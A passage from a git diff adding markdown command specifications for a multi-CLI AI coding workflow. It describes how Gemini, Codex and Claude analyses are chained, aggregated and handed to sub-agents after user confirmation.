.map(([name, config]) => ({
|
||||
name, type: 'cli',
|
||||
tags: config.tags || [],
|
||||
model: config.primaryModel,
|
||||
toolType: config.type // builtin, cli-wrapper, api-endpoint
|
||||
}))
|
||||
```
|
||||
|
||||
**Sub Agents**:
|
||||
|
||||
| Agent | Strengths | canExecute |
|
||||
|-------|-----------|------------|
|
||||
| **code-developer** | Code implementation, test writing | ✅ |
|
||||
| **Explore** | Fast code exploration, pattern discovery | ❌ |
|
||||
| **cli-explore-agent** | Dual-source analysis (Bash+CLI) | ❌ |
|
||||
| **cli-discuss-agent** | Multi-CLI collaboration, cross-verification | ❌ |
|
||||
| **debug-explore-agent** | Hypothesis-driven debugging | ❌ |
|
||||
| **context-search-agent** | Multi-layer file discovery, dependency analysis | ❌ |
|
||||
| **test-fix-agent** | Test execution, failure diagnosis, code fixing | ✅ |
|
||||
| **universal-executor** | General execution, multi-domain adaptation | ✅ |
|
||||
|
||||
**Analysis Modes**:
|
||||
|
||||
| Mode | Pattern | Use Case | minCLIs |
|
||||
|------|---------|----------|---------|
|
||||
| **Parallel** | `A \|\| B \|\| C → Aggregate` | Fast multi-perspective | 1+ |
|
||||
| **Sequential** | `A → B(resume) → C(resume)` | Incremental deepening | 2+ |
|
||||
| **Collaborative** | `A → B → A → B → Synthesize` | Multi-round refinement | 2+ |
|
||||
| **Debate** | `A(propose) → B(challenge) → A(defend)` | Adversarial validation | 2 |
|
||||
| **Challenge** | `A(analyze) → B(challenge)` | Find flaws and risks | 2 |
|
||||
|
||||
### Three-Step Selection Flow
|
||||
|
||||
```javascript
|
||||
// Step 1: Select CLIs (multiSelect)
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Select CLI tools for analysis (1-3 for collaboration modes)",
|
||||
header: "CLI Tools",
|
||||
options: cliTools.map(cli => ({
|
||||
label: cli.name,
|
||||
description: cli.tags.length > 0 ? cli.tags.join(', ') : cli.model || 'general'
|
||||
})),
|
||||
multiSelect: true
|
||||
}]
|
||||
})
|
||||
|
||||
// Step 2: Select Mode (filtered by CLI count)
|
||||
const availableModes = analysisModes.filter(m => selectedCLIs.length >= m.minCLIs)
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Select analysis mode",
|
||||
header: "Mode",
|
||||
options: availableModes.map(m => ({
|
||||
label: m.label,
|
||||
description: `${m.description} [${m.pattern}]`
|
||||
})),
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
|
||||
// Step 3: Select Agent for execution
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Select Sub Agent for execution",
|
||||
header: "Agent",
|
||||
options: agents.map(a => ({ label: a.name, description: a.strength })),
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
|
||||
// Confirm selection
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Confirm selection?",
|
||||
header: "Confirm",
|
||||
options: [
|
||||
{ label: "Confirm and continue", description: `${selectedMode.label} with ${selectedCLIs.length} CLIs` },
|
||||
{ label: "Re-select CLIs", description: "Choose different CLI tools" },
|
||||
{ label: "Re-select Mode", description: "Choose different analysis mode" },
|
||||
{ label: "Re-select Agent", description: "Choose different Sub Agent" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
## Phase 3: Multi-Mode Analysis
|
||||
|
||||
### Universal CLI Prompt Template
|
||||
|
||||
```javascript
|
||||
// Unified prompt builder - used by all modes
|
||||
function buildPrompt({ purpose, tasks, expected, rules, taskDescription }) {
|
||||
return `
|
||||
PURPOSE: ${purpose}: ${taskDescription}
|
||||
TASK: ${tasks.map(t => `• ${t}`).join(' ')}
|
||||
MODE: analysis
|
||||
CONTEXT: @**/*
|
||||
EXPECTED: ${expected}
|
||||
CONSTRAINTS: ${rules}
|
||||
`
|
||||
}
|
||||
|
||||
// Execute CLI with prompt
|
||||
function execCLI(cli, prompt, options = {}) {
|
||||
const { resume, background = false } = options
|
||||
const resumeFlag = resume ? `--resume ${resume}` : ''
|
||||
return Bash({
|
||||
command: `ccw cli -p "${prompt}" --tool ${cli.name} --mode analysis ${resumeFlag}`,
|
||||
run_in_background: background
|
||||
})
|
||||
}
|
||||
```
|
||||
|
||||
### Prompt Presets by Role
|
||||
|
||||
| Role | PURPOSE | TASKS | EXPECTED | RULES |
|
||||
|------|---------|-------|----------|-------|
|
||||
| **initial** | Initial analysis | Identify files, Analyze approach, List changes | Root cause, files, changes, risks | Focus on actionable insights |
|
||||
| **extend** | Build on previous | Review previous, Extend, Add insights | Extended analysis building on findings | Build incrementally, avoid repetition |
|
||||
| **synthesize** | Refine and synthesize | Review, Identify gaps, Synthesize | Refined synthesis with new perspectives | Add value not repetition |
|
||||
| **propose** | Propose comprehensive analysis | Analyze thoroughly, Propose solution, State assumptions | Well-reasoned proposal with trade-offs | Be clear about assumptions |
|
||||
| **challenge** | Challenge and stress-test | Identify weaknesses, Question assumptions, Suggest alternatives | Critique with counter-arguments | Be adversarial but constructive |
|
||||
| **defend** | Respond to challenges | Address challenges, Defend valid aspects, Propose refined solution | Refined proposal incorporating feedback | Be open to criticism, synthesize |
|
||||
| **criticize** | Find flaws ruthlessly | Find logical flaws, Identify edge cases, Rate criticisms | Critique with severity: [CRITICAL]/[HIGH]/[MEDIUM]/[LOW] | Be ruthlessly critical |
|
||||
|
||||
```javascript
|
||||
const PROMPTS = {
|
||||
initial: { purpose: 'Initial analysis', tasks: ['Identify affected files', 'Analyze implementation approach', 'List specific changes'], expected: 'Root cause, files to modify, key changes, risks', rules: 'Focus on actionable insights' },
|
||||
extend: { purpose: 'Build on previous analysis', tasks: ['Review previous findings', 'Extend analysis', 'Add new insights'], expected: 'Extended analysis building on previous', rules: 'Build incrementally, avoid repetition' },
|
||||
synthesize: { purpose: 'Refine and synthesize', tasks: ['Review previous', 'Identify gaps', 'Add insights', 'Synthesize findings'], expected: 'Refined synthesis with new perspectives', rules: 'Build collaboratively, add value' },
|
||||
propose: { purpose: 'Propose comprehensive analysis', tasks: ['Analyze thoroughly', 'Propose solution', 'State assumptions clearly'], expected: 'Well-reasoned proposal with trade-offs', rules: 'Be clear about assumptions' },
|
||||
challenge: { purpose: 'Challenge and stress-test', tasks: ['Identify weaknesses', 'Question assumptions', 'Suggest alternatives', 'Highlight overlooked risks'], expected: 'Constructive critique with counter-arguments', rules: 'Be adversarial but constructive' },
|
||||
defend: { purpose: 'Respond to challenges', tasks: ['Address each challenge', 'Defend valid aspects', 'Acknowledge valid criticisms', 'Propose refined solution'], expected: 'Refined proposal incorporating alternatives', rules: 'Be open to criticism, synthesize best ideas' },
|
||||
criticize: { purpose: 'Stress-test and find weaknesses', tasks: ['Find logical flaws', 'Identify missed edge cases', 'Propose alternatives', 'Rate criticisms (High/Medium/Low)'], expected: 'Detailed critique with severity ratings', rules: 'Be ruthlessly critical, find every flaw' }
|
||||
}
|
||||
```
|
||||
|
||||
### Mode Implementations
|
||||
|
||||
```javascript
|
||||
// Parallel: All CLIs run simultaneously
|
||||
async function executeParallel(clis, task) {
|
||||
return await Promise.all(clis.map(cli =>
|
||||
execCLI(cli, buildPrompt({ ...PROMPTS.initial, taskDescription: task }), { background: true })
|
||||
))
|
||||
}
|
||||
|
||||
// Sequential: Each CLI builds on previous via --resume
|
||||
async function executeSequential(clis, task) {
|
||||
const results = []
|
||||
let prevId = null
|
||||
for (const cli of clis) {
|
||||
const preset = prevId ? PROMPTS.extend : PROMPTS.initial
|
||||
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
|
||||
results.push(result)
|
||||
prevId = extractSessionId(result)
|
||||
}
|
||||
return results
|
||||
}
|
||||
|
||||
// Collaborative: Multi-round synthesis
|
||||
async function executeCollaborative(clis, task, rounds = 2) {
|
||||
const results = []
|
||||
let prevId = null
|
||||
for (let r = 0; r < rounds; r++) {
|
||||
for (const cli of clis) {
|
||||
const preset = !prevId ? PROMPTS.initial : PROMPTS.synthesize
|
||||
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
|
||||
results.push({ cli: cli.name, round: r, result })
|
||||
prevId = extractSessionId(result)
|
||||
}
|
||||
}
|
||||
return results
|
||||
}
|
||||
|
||||
// Debate: Propose → Challenge → Defend
|
||||
async function executeDebate(clis, task) {
|
||||
const [cliA, cliB] = clis
|
||||
const results = []
|
||||
|
||||
const propose = await execCLI(cliA, buildPrompt({ ...PROMPTS.propose, taskDescription: task }))
|
||||
results.push({ phase: 'propose', cli: cliA.name, result: propose })
|
||||
|
||||
const challenge = await execCLI(cliB, buildPrompt({ ...PROMPTS.challenge, taskDescription: task }), { resume: extractSessionId(propose) })
|
||||
results.push({ phase: 'challenge', cli: cliB.name, result: challenge })
|
||||
|
||||
const defend = await execCLI(cliA, buildPrompt({ ...PROMPTS.defend, taskDescription: task }), { resume: extractSessionId(challenge) })
|
||||
results.push({ phase: 'defend', cli: cliA.name, result: defend })
|
||||
|
||||
return results
|
||||
}
|
||||
|
||||
// Challenge: Analyze → Criticize
|
||||
async function executeChallenge(clis, task) {
|
||||
const [cliA, cliB] = clis
|
||||
const results = []
|
||||
|
||||
const analyze = await execCLI(cliA, buildPrompt({ ...PROMPTS.initial, taskDescription: task }))
|
||||
results.push({ phase: 'analyze', cli: cliA.name, result: analyze })
|
||||
|
||||
const criticize = await execCLI(cliB, buildPrompt({ ...PROMPTS.criticize, taskDescription: task }), { resume: extractSessionId(analyze) })
|
||||
results.push({ phase: 'challenge', cli: cliB.name, result: criticize })
|
||||
|
||||
return results
|
||||
}
|
||||
```
|
||||
|
||||
### Mode Router & Result Aggregation
|
||||
|
||||
```javascript
|
||||
async function executeAnalysis(mode, clis, taskDescription) {
|
||||
switch (mode.name) {
|
||||
case 'parallel': return await executeParallel(clis, taskDescription)
|
||||
case 'sequential': return await executeSequential(clis, taskDescription)
|
||||
case 'collaborative': return await executeCollaborative(clis, taskDescription)
|
||||
case 'debate': return await executeDebate(clis, taskDescription)
|
||||
case 'challenge': return await executeChallenge(clis, taskDescription)
|
||||
}
|
||||
}
|
||||
|
||||
function aggregateResults(mode, results) {
|
||||
const base = { mode: mode.name, pattern: mode.pattern, tools_used: results.map(r => r.cli || 'unknown') }
|
||||
|
||||
switch (mode.name) {
|
||||
case 'parallel':
|
||||
return { ...base, findings: results.map(parseOutput), consensus: findCommonPoints(results), divergences: findDifferences(results) }
|
||||
case 'sequential':
|
||||
return { ...base, evolution: results.map((r, i) => ({ step: i + 1, analysis: parseOutput(r) })), finalAnalysis: parseOutput(results.at(-1)) }
|
||||
case 'collaborative':
|
||||
return { ...base, rounds: groupByRound(results), synthesis: extractSynthesis(results.at(-1)) }
|
||||
case 'debate':
|
||||
return { ...base, proposal: parseOutput(results.find(r => r.phase === 'propose')?.result),
|
||||
challenges: parseOutput(results.find(r => r.phase === 'challenge')?.result),
|
||||
resolution: parseOutput(results.find(r => r.phase === 'defend')?.result), confidence: calculateDebateConfidence(results) }
|
||||
case 'challenge':
|
||||
return { ...base, originalAnalysis: parseOutput(results.find(r => r.phase === 'analyze')?.result),
|
||||
critiques: parseCritiques(results.find(r => r.phase === 'challenge')?.result), riskScore: calculateRiskScore(results) }
|
||||
}
|
||||
}
|
||||
|
||||
// If planPath exists: update Analysis Summary & Execution Plan sections
|
||||
```
|
||||
|
||||
## Phase 4: User Decision
|
||||
|
||||
```javascript
|
||||
function presentSummary(analysis) {
|
||||
console.log(`## Analysis Result\n**Mode**: ${analysis.mode} (${analysis.pattern})\n**Tools**: ${analysis.tools_used.join(' → ')}`)
|
||||
|
||||
switch (analysis.mode) {
|
||||
case 'parallel':
|
||||
console.log(`### Consensus\n${analysis.consensus.map(c => `- ${c}`).join('\n')}\n### Divergences\n${analysis.divergences.map(d => `- ${d}`).join('\n')}`)
|
||||
break
|
||||
case 'sequential':
|
||||
console.log(`### Evolution\n${analysis.evolution.map(e => `**Step ${e.step}**: ${e.analysis.summary}`).join('\n')}\n### Final\n${analysis.finalAnalysis.summary}`)
|
||||
break
|
||||
case 'collaborative':
|
||||
console.log(`### Rounds\n${Object.entries(analysis.rounds).map(([r, a]) => `**Round ${r}**: ${a.map(x => x.cli).join(' + ')}`).join('\n')}\n### Synthesis\n${analysis.synthesis}`)
|
||||
break
|
||||
case 'debate':
|
||||
console.log(`### Debate\n**Proposal**: ${analysis.proposal.summary}\n**Challenges**: ${analysis.challenges.points?.length || 0} points\n**Resolution**: ${analysis.resolution.summary}\n**Confidence**: ${analysis.confidence}%`)
|
||||
break
|
||||
case 'challenge':
|
||||
console.log(`### Challenge\n**Original**: ${analysis.originalAnalysis.summary}\n**Critiques**: ${analysis.critiques.length} issues\n${analysis.critiques.map(c => `- [${c.severity}] ${c.description}`).join('\n')}\n**Risk Score**: ${analysis.riskScore}/100`)
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "How to proceed?",
|
||||
header: "Next Step",
|
||||
options: [
|
||||
{ label: "Execute directly", description: "Implement immediately" },
|
||||
{ label: "Refine analysis", description: "Add constraints, re-analyze" },
|
||||
{ label: "Change tools", description: "Different tool combination" },
|
||||
{ label: "Cancel", description: "End workflow" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
// If planPath exists: record decision to Decisions Made table
|
||||
// Routing: Execute → Phase 5 | Refine → Phase 3 | Change → Phase 2 | Cancel → End
|
||||
```
|
||||
|
||||
## Phase 5: Direct Execution
|
||||
|
||||
```javascript
|
||||
// Simple tasks: No artifacts | Complex tasks: Update scratchpad doc
|
||||
const executionAgents = agents.filter(a => a.canExecute)
|
||||
const executionTool = selectedAgent.canExecute ? selectedAgent : selectedCLIs[0]
|
||||
|
||||
if (executionTool.type === 'agent') {
|
||||
Task({
|
||||
subagent_type: executionTool.name,
|
||||
run_in_background: false,
|
||||
description: `Execute: ${taskDescription.slice(0, 30)}`,
|
||||
prompt: `## Task\n${taskDescription}\n\n## Analysis Results\n${JSON.stringify(aggregatedAnalysis, null, 2)}\n\n## Instructions\n1. Apply changes to identified files\n2. Follow recommended approach\n3. Handle identified risks\n4. Verify changes work correctly`
|
||||
})
|
||||
} else {
|
||||
Bash({
|
||||
command: `ccw cli -p "
|
||||
PURPOSE: Implement solution: ${taskDescription}
|
||||
TASK: ${extractedTasks.join(' • ')}
|
||||
MODE: write
|
||||
CONTEXT: @${affectedFiles.join(' @')}
|
||||
EXPECTED: Working implementation with all changes applied
|
||||
CONSTRAINTS: Follow existing patterns
|
||||
" --tool ${executionTool.name} --mode write`,
|
||||
run_in_background: false
|
||||
})
|
||||
}
|
||||
// If planPath exists: update Status to completed/failed, append to Progress Log
|
||||
```
|
||||
|
||||
## TodoWrite Structure
|
||||
|
||||
```javascript
|
||||
TodoWrite({ todos: [
|
||||
{ content: "Phase 1: Clarify requirements", status: "in_progress", activeForm: "Clarifying requirements" },
|
||||
{ content: "Phase 1.5: Assess complexity", status: "pending", activeForm: "Assessing complexity" },
|
||||
{ content: "Phase 2: Select tools", status: "pending", activeForm: "Selecting tools" },
|
||||
{ content: "Phase 3: Multi-mode analysis", status: "pending", activeForm: "Running analysis" },
|
||||
{ content: "Phase 4: User decision", status: "pending", activeForm: "Awaiting decision" },
|
||||
{ content: "Phase 5: Direct execution", status: "pending", activeForm: "Executing" }
|
||||
]})
|
||||
```
|
||||
|
||||
## Iteration Patterns
|
||||
|
||||
| Pattern | Flow |
|
||||
|---------|------|
|
||||
| **Direct** | Phase 1 → 2 → 3 → 4(execute) → 5 |
|
||||
| **Refinement** | Phase 3 → 4(refine) → 3 → 4 → 5 |
|
||||
| **Tool Adjust** | Phase 2(adjust) → 3 → 4 → 5 |
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error | Resolution |
|
||||
|-------|------------|
|
||||
| CLI timeout | Retry with secondary model |
|
||||
| No enabled tools | Ask user to enable tools in cli-tools.json |
|
||||
| Task unclear | Default to first CLI + code-developer |
|
||||
| Ambiguous task | Force clarification via AskUser |
|
||||
| Execution fails | Present error, ask user for direction |
|
||||
| Plan doc write fails | Continue without doc (degrade to zero-artifact mode) |
|
||||
| Scratchpad dir missing | Auto-create `.workflow/.scratchpad/` |
|
||||
|
||||
## Comparison with multi-cli-plan
|
||||
|
||||
| Aspect | lite-lite-lite | multi-cli-plan |
|
||||
|--------|----------------|----------------|
|
||||
| **Artifacts** | Conditional (scratchpad doc for complex tasks) | Always (IMPL_PLAN.md, plan.json, synthesis.json) |
|
||||
| **Session** | Stateless (--resume chaining) | Persistent session folder |
|
||||
| **Tool Selection** | 3-step (CLI → Mode → Agent) | Config-driven fixed tools |
|
||||
| **Analysis Modes** | 5 modes with --resume | Fixed synthesis rounds |
|
||||
| **Complexity** | Auto-detected (simple/moderate/complex) | Assumed complex |
|
||||
| **Best For** | Quick analysis, simple-to-moderate tasks | Complex multi-step implementations |
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
/workflow:multi-cli-plan "complex task" # Full planning workflow
|
||||
/workflow:lite-plan "task" # Single CLI planning
|
||||
/workflow:lite-execute --in-memory # Direct execution
|
||||
```
|
||||
@@ -497,6 +497,7 @@ ${plan.tasks.map((t, i) => `${i+1}. ${t.title} (${t.file})`).join('\n')}
|
||||
|
||||
**Step 4.2: Collect Confirmation**
|
||||
```javascript
|
||||
// Note: Execution "Other" option allows specifying CLI tools from ~/.claude/cli-tools.json
|
||||
AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
@@ -524,8 +525,9 @@ AskUserQuestion({
|
||||
header: "Review",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Gemini Review", description: "Gemini CLI" },
|
||||
{ label: "Agent Review", description: "@code-reviewer" },
|
||||
{ label: "Gemini Review", description: "Gemini CLI review" },
|
||||
{ label: "Codex Review", description: "Git-aware review (prompt OR --uncommitted)" },
|
||||
{ label: "Agent Review", description: "@code-reviewer agent" },
|
||||
{ label: "Skip", description: "No review" }
|
||||
]
|
||||
}
|
||||
|
||||
568
.claude/commands/workflow/multi-cli-plan.md
Normal file
568
.claude/commands/workflow/multi-cli-plan.md
Normal file
@@ -0,0 +1,568 @@
|
||||
---
|
||||
name: workflow:multi-cli-plan
|
||||
description: Multi-CLI collaborative planning workflow with ACE context gathering and iterative cross-verification. Uses cli-discuss-agent for Gemini+Codex+Claude analysis to converge on optimal execution plan.
|
||||
argument-hint: "<task description> [--max-rounds=3] [--tools=gemini,codex] [--mode=parallel|serial]"
|
||||
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), Write(*), mcp__ace-tool__search_context(*)
|
||||
---
|
||||
|
||||
# Multi-CLI Collaborative Planning Command
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Basic usage
|
||||
/workflow:multi-cli-plan "Implement user authentication"
|
||||
|
||||
# With options
|
||||
/workflow:multi-cli-plan "Add dark mode support" --max-rounds=3
|
||||
/workflow:multi-cli-plan "Refactor payment module" --tools=gemini,codex,claude
|
||||
/workflow:multi-cli-plan "Fix memory leak" --mode=serial
|
||||
```
|
||||
|
||||
**Context Source**: ACE semantic search + Multi-CLI analysis
|
||||
**Output Directory**: `.workflow/.multi-cli-plan/{session-id}/`
|
||||
**Default Max Rounds**: 3 (convergence may complete earlier)
|
||||
**CLI Tools**: @cli-discuss-agent (analysis), @cli-lite-planning-agent (plan generation)
|
||||
**Execution**: Auto-hands off to `/workflow:lite-execute --in-memory` after plan approval
|
||||
|
||||
## What & Why
|
||||
|
||||
### Core Concept
|
||||
|
||||
Multi-CLI collaborative planning with **three-phase architecture**: ACE context gathering → Iterative multi-CLI discussion → Plan generation. Orchestrator delegates analysis to agents, only handles user decisions and session management.
|
||||
|
||||
**Process**:
|
||||
- **Phase 1**: ACE semantic search gathers codebase context
|
||||
- **Phase 2**: cli-discuss-agent orchestrates Gemini/Codex/Claude for cross-verified analysis
|
||||
- **Phase 3-5**: User decision → Plan generation → Execution handoff
|
||||
|
||||
**vs Single-CLI Planning**:
|
||||
- **Single**: One model perspective, potential blind spots
|
||||
- **Multi-CLI**: Cross-verification catches inconsistencies, builds consensus on solutions
|
||||
|
||||
### Value Proposition
|
||||
|
||||
1. **Multi-Perspective Analysis**: Gemini + Codex + Claude analyze from different angles
|
||||
2. **Cross-Verification**: Identify agreements/disagreements, build confidence
|
||||
3. **User-Driven Decisions**: Every round ends with user decision point
|
||||
4. **Iterative Convergence**: Progressive refinement until consensus reached
|
||||
|
||||
### Orchestrator Boundary (CRITICAL)
|
||||
|
||||
- **ONLY command** for multi-CLI collaborative planning
|
||||
- Manages: Session state, user decisions, agent delegation, phase transitions
|
||||
- Delegates: CLI execution to @cli-discuss-agent, plan generation to @cli-lite-planning-agent
|
||||
|
||||
### Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Context Gathering
|
||||
└─ ACE semantic search, extract keywords, build context package
|
||||
|
||||
Phase 2: Multi-CLI Discussion (Iterative, via @cli-discuss-agent)
|
||||
├─ Round N: Agent executes Gemini + Codex + Claude
|
||||
├─ Cross-verify findings, synthesize solutions
|
||||
├─ Write synthesis.json to rounds/{N}/
|
||||
└─ Loop until convergence or max rounds
|
||||
|
||||
Phase 3: Present Options
|
||||
└─ Display solutions with trade-offs from agent output
|
||||
|
||||
Phase 4: User Decision
|
||||
├─ Select solution approach
|
||||
├─ Select execution method (Agent/Codex/Auto)
|
||||
├─ Select code review tool (Skip/Gemini/Codex/Agent)
|
||||
└─ Route:
|
||||
├─ Approve → Phase 5
|
||||
├─ Need More Analysis → Return to Phase 2
|
||||
└─ Cancel → Save session
|
||||
|
||||
Phase 5: Plan Generation & Execution Handoff
|
||||
├─ Generate plan.json (via @cli-lite-planning-agent)
|
||||
├─ Build executionContext with user selections
|
||||
└─ Execute to /workflow:lite-execute --in-memory
|
||||
```
|
||||
|
||||
### Agent Roles
|
||||
|
||||
| Agent | Responsibility |
|
||||
|-------|---------------|
|
||||
| **Orchestrator** | Session management, ACE context, user decisions, phase transitions, executionContext assembly |
|
||||
| **@cli-discuss-agent** | Multi-CLI execution (Gemini/Codex/Claude), cross-verification, solution synthesis, synthesis.json output |
|
||||
| **@cli-lite-planning-agent** | Task decomposition, plan.json generation following schema |
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
### Phase 1: Context Gathering
|
||||
|
||||
**Session Initialization**:
|
||||
```javascript
|
||||
const sessionId = `MCP-${taskSlug}-${date}`
|
||||
const sessionFolder = `.workflow/.multi-cli-plan/${sessionId}`
|
||||
Bash(`mkdir -p ${sessionFolder}/rounds`)
|
||||
```
|
||||
|
||||
**ACE Context Queries**:
|
||||
```javascript
|
||||
const aceQueries = [
|
||||
`Project architecture related to ${keywords}`,
|
||||
`Existing implementations of ${keywords[0]}`,
|
||||
`Code patterns for ${keywords} features`,
|
||||
`Integration points for ${keywords[0]}`
|
||||
]
|
||||
// Execute via mcp__ace-tool__search_context
|
||||
```
|
||||
|
||||
**Context Package** (passed to agent):
|
||||
- `relevant_files[]` - Files identified by ACE
|
||||
- `detected_patterns[]` - Code patterns found
|
||||
- `architecture_insights` - Structure understanding
|
||||
|
||||
### Phase 2: Agent Delegation
|
||||
|
||||
**Core Principle**: Orchestrator only delegates and reads output - NO direct CLI execution.
|
||||
|
||||
**Agent Invocation**:
|
||||
```javascript
|
||||
Task({
|
||||
subagent_type: "cli-discuss-agent",
|
||||
run_in_background: false,
|
||||
description: `Discussion round ${currentRound}`,
|
||||
prompt: `
|
||||
## Input Context
|
||||
- task_description: ${taskDescription}
|
||||
- round_number: ${currentRound}
|
||||
- session: { id: "${sessionId}", folder: "${sessionFolder}" }
|
||||
- ace_context: ${JSON.stringify(contextPackageage)}
|
||||
- previous_rounds: ${JSON.stringify(analysisResults)}
|
||||
- user_feedback: ${userFeedback || 'None'}
|
||||
- cli_config: { tools: ["gemini", "codex"], mode: "parallel", fallback_chain: ["gemini", "codex", "claude"] }
|
||||
|
||||
## Execution Process
|
||||
1. Parse input context (handle JSON strings)
|
||||
2. Check if ACE supplementary search needed
|
||||
3. Build CLI prompts with context
|
||||
4. Execute CLIs (parallel or serial per cli_config.mode)
|
||||
5. Parse CLI outputs, handle failures with fallback
|
||||
6. Perform cross-verification between CLI results
|
||||
7. Synthesize solutions, calculate scores
|
||||
8. Calculate convergence, generate clarification questions
|
||||
9. Write synthesis.json
|
||||
|
||||
## Output
|
||||
Write: ${sessionFolder}/rounds/${currentRound}/synthesis.json
|
||||
|
||||
## Completion Checklist
|
||||
- [ ] All configured CLI tools executed (or fallback triggered)
|
||||
- [ ] Cross-verification completed with agreements/disagreements
|
||||
- [ ] 2-3 solutions generated with file:line references
|
||||
- [ ] Convergence score calculated (0.0-1.0)
|
||||
- [ ] synthesis.json written with all Primary Fields
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
**Read Agent Output**:
|
||||
```javascript
|
||||
const synthesis = JSON.parse(Read(`${sessionFolder}/rounds/${round}/synthesis.json`))
|
||||
// Access top-level fields: solutions, convergence, cross_verification, clarification_questions
|
||||
```
|
||||
|
||||
**Convergence Decision**:
|
||||
```javascript
|
||||
if (synthesis.convergence.recommendation === 'converged') {
|
||||
// Proceed to Phase 3
|
||||
} else if (synthesis.convergence.recommendation === 'user_input_needed') {
|
||||
// Collect user feedback, return to Phase 2
|
||||
} else {
|
||||
// Continue to next round if new_insights && round < maxRounds
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: Present Options
|
||||
|
||||
**Display from Agent Output** (no processing):
|
||||
```javascript
|
||||
console.log(`
|
||||
## Solution Options
|
||||
|
||||
${synthesis.solutions.map((s, i) => `
|
||||
**Option ${i+1}: ${s.name}**
|
||||
Source: ${s.source_cli.join(' + ')}
|
||||
Effort: ${s.effort} | Risk: ${s.risk}
|
||||
|
||||
Pros: ${s.pros.join(', ')}
|
||||
Cons: ${s.cons.join(', ')}
|
||||
|
||||
Files: ${s.affected_files.slice(0,3).map(f => `${f.file}:${f.line}`).join(', ')}
|
||||
`).join('\n')}
|
||||
|
||||
## Cross-Verification
|
||||
Agreements: ${synthesis.cross_verification.agreements.length}
|
||||
Disagreements: ${synthesis.cross_verification.disagreements.length}
|
||||
`)
|
||||
```
|
||||
|
||||
### Phase 4: User Decision
|
||||
|
||||
**Decision Options**:
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [
|
||||
{
|
||||
question: "Which solution approach?",
|
||||
header: "Solution",
|
||||
multiSelect: false,
|
||||
options: solutions.map((s, i) => ({
|
||||
label: `Option ${i+1}: ${s.name}`,
|
||||
description: `${s.effort} effort, ${s.risk} risk`
|
||||
})).concat([
|
||||
{ label: "Need More Analysis", description: "Return to Phase 2" }
|
||||
])
|
||||
},
|
||||
{
|
||||
question: "Execution method:",
|
||||
header: "Execution",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Agent", description: "@code-developer agent" },
|
||||
{ label: "Codex", description: "codex CLI tool" },
|
||||
{ label: "Auto", description: "Auto-select based on complexity" }
|
||||
]
|
||||
},
|
||||
{
|
||||
question: "Code review after execution?",
|
||||
header: "Review",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Skip", description: "No review" },
|
||||
{ label: "Gemini Review", description: "Gemini CLI tool" },
|
||||
{ label: "Codex Review", description: "codex review --uncommitted" },
|
||||
{ label: "Agent Review", description: "Current agent review" }
|
||||
]
|
||||
}
|
||||
]
|
||||
})
|
||||
```
|
||||
|
||||
**Routing**:
|
||||
- Approve + execution method → Phase 5
|
||||
- Need More Analysis → Phase 2 with feedback
|
||||
- Cancel → Save session for resumption
|
||||
|
||||
### Phase 5: Plan Generation & Execution Handoff
|
||||
|
||||
**Step 1: Build Context-Package** (Orchestrator responsibility):
|
||||
```javascript
|
||||
// Extract key information from user decision and synthesis
|
||||
const contextPackage = {
|
||||
// Core solution details
|
||||
solution: {
|
||||
name: selectedSolution.name,
|
||||
source_cli: selectedSolution.source_cli,
|
||||
feasibility: selectedSolution.feasibility,
|
||||
effort: selectedSolution.effort,
|
||||
risk: selectedSolution.risk,
|
||||
summary: selectedSolution.summary
|
||||
},
|
||||
// Implementation plan (tasks, flow, milestones)
|
||||
implementation_plan: selectedSolution.implementation_plan,
|
||||
// Dependencies
|
||||
dependencies: selectedSolution.dependencies || { internal: [], external: [] },
|
||||
// Technical concerns
|
||||
technical_concerns: selectedSolution.technical_concerns || [],
|
||||
// Consensus from cross-verification
|
||||
consensus: {
|
||||
agreements: synthesis.cross_verification.agreements,
|
||||
resolved_conflicts: synthesis.cross_verification.resolution
|
||||
},
|
||||
// User constraints (from Phase 4 feedback)
|
||||
constraints: userConstraints || [],
|
||||
// Task context
|
||||
task_description: taskDescription,
|
||||
session_id: sessionId
|
||||
}
|
||||
|
||||
// Write context-package for traceability
|
||||
Write(`${sessionFolder}/context-package.json`, JSON.stringify(contextPackage, null, 2))
|
||||
```
|
||||
|
||||
**Context-Package Schema**:
|
||||
|
||||
| Field | Type | Description |
|
||||
|-------|------|-------------|
|
||||
| `solution` | object | User-selected solution from synthesis |
|
||||
| `solution.name` | string | Solution identifier |
|
||||
| `solution.feasibility` | number | Viability score (0-1) |
|
||||
| `solution.summary` | string | Brief analysis summary |
|
||||
| `implementation_plan` | object | Task breakdown with flow and dependencies |
|
||||
| `implementation_plan.approach` | string | High-level technical strategy |
|
||||
| `implementation_plan.tasks[]` | array | Discrete tasks with id, name, depends_on, files |
|
||||
| `implementation_plan.execution_flow` | string | Task sequence (e.g., "T1 → T2 → T3") |
|
||||
